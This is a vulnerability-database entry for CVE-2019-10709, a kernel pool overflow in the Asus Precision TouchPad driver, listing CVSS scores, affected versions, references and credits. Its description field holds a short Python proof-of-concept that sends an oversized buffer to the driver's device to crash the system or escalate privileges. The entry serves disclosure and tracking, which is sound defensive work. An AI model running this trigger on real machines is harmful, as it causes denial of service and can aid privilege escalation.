Details of VAR-201909-1469

ID

VAR-201909-1469

CVE

CVE-2019-10709

TITLE

Asus Precision TouchPad Vulnerabilities related to authorization, permissions, and access control

Trust: 0.8

sources: JVNDB: JVNDB-2019-008875

DESCRIPTION

AsusPTPFilter.sys on Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the \\.\AsusTP device, leading to a DoS or potentially privilege escalation via a crafted DeviceIoControl call. Asus Precision TouchPad Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asus Precision TouchPad is a touchpad driver from Taiwan ASUS Corporation. A security vulnerability exists in ASUS Asus Precision TouchPad version 11.0.0.25. An attacker could exploit this vulnerability to cause a denial of service and escalate privileges. #!/usr/bin/python # Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc # Date: 29-08-2019 # Exploit Author: Athanasios Tserpelis of Telspace Systems # Vendor Homepage: https://www.asus.com # Version: 11.0.0.25 # Software Link : https://www.asus.com # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows 10 RS5 x64 # CVE: CVE-2019-10709 from ctypes import * kernel32 = windll.kernel32 ntdll = windll.ntdll NULL = 0 hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print "*** Couldn't get Device Driver handle." sys.exit(0) buf = "A"*12048 raw_input("Press Enter to Trigger Vuln") kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL)

Trust: 1.8

sources: NVD: CVE-2019-10709 // JVNDB: JVNDB-2019-008875 // VULHUB: VHN-142282 // PACKETSTORM: 154259

AFFECTED PRODUCTS

vendor:	asus	model:	precision touchpad	scope:	eq	version:	11.0.0.25	Trust: 1.0
vendor:	asustek computer	model:	precision touchpad	scope:	eq	version:	11.0.0.25	Trust: 0.8

sources: JVNDB: JVNDB-2019-008875 // NVD: CVE-2019-10709

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2019-10709
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2019-10709
value:	CRITICAL
Trust: 0.8
CNNVD:	CNNVD-201908-2255
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-142282
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2019-10709
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-142282
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2019-10709
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: VULHUB: VHN-142282 // JVNDB: JVNDB-2019-008875 // CNNVD: CNNVD-201908-2255 // NVD: CVE-2019-10709

PROBLEMTYPE DATA

problemtype:

CWE-264

Trust: 1.9

sources: VULHUB: VHN-142282 // JVNDB: JVNDB-2019-008875 // NVD: CVE-2019-10709

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201908-2255

TYPE

permissions and access control issues

Trust: 0.6

sources: CNNVD: CNNVD-201908-2255

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-008875

PATCH

title:

Top Page

url:

https://www.asustor.com/

Trust: 0.8

sources: JVNDB: JVNDB-2019-008875

EXTERNAL IDS

db:	NVD	id:	CVE-2019-10709	Trust: 2.6
db:	PACKETSTORM	id:	154259	Trust: 2.6
db:	JVNDB	id:	JVNDB-2019-008875	Trust: 0.8
db:	CNNVD	id:	CNNVD-201908-2255	Trust: 0.7
db:	EXPLOIT-DB	id:	47322	Trust: 0.6
db:	CNVD	id:	CNVD-2020-22304	Trust: 0.1
db:	VULHUB	id:	VHN-142282	Trust: 0.1

sources: VULHUB: VHN-142282 // JVNDB: JVNDB-2019-008875 // PACKETSTORM: 154259 // CNNVD: CNNVD-201908-2255 // NVD: CVE-2019-10709

REFERENCES

url:	http://packetstormsecurity.com/files/154259/asus-precision-touchpad-11.0.0.25-denial-of-service-privilege-escalation.html	Trust: 2.5
url:	https://blog.telspace.co.za/2019/08/tsa-2019-001-asus-precision-touchpad.html	Trust: 1.7
url:	https://nvd.nist.gov/vuln/detail/cve-2019-10709	Trust: 1.5
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10709	Trust: 0.8
url:	https://www.exploit-db.com/exploits/47322	Trust: 0.6
url:	https://www.asus.com	Trust: 0.1

sources: VULHUB: VHN-142282 // JVNDB: JVNDB-2019-008875 // PACKETSTORM: 154259 // CNNVD: CNNVD-201908-2255 // NVD: CVE-2019-10709

CREDITS

Athanasios Tserpelis

Trust: 0.7

sources: PACKETSTORM: 154259 // CNNVD: CNNVD-201908-2255

SOURCES

db:	VULHUB	id:	VHN-142282
db:	JVNDB	id:	JVNDB-2019-008875
db:	PACKETSTORM	id:	154259
db:	CNNVD	id:	CNNVD-201908-2255
db:	NVD	id:	CVE-2019-10709

LAST UPDATE DATE

2024-11-23T22:29:52.529000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-142282	date:	2019-09-05T00:00:00
db:	JVNDB	id:	JVNDB-2019-008875	date:	2019-09-09T00:00:00
db:	CNNVD	id:	CNNVD-201908-2255	date:	2019-09-12T00:00:00
db:	NVD	id:	CVE-2019-10709	date:	2024-11-21T04:19:46.880

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-142282	date:	2019-09-04T00:00:00
db:	JVNDB	id:	JVNDB-2019-008875	date:	2019-09-09T00:00:00
db:	PACKETSTORM	id:	154259	date:	2019-08-30T15:36:20
db:	CNNVD	id:	CNNVD-201908-2255	date:	2019-08-30T00:00:00
db:	NVD	id:	CVE-2019-10709	date:	2019-09-04T12:15:10.967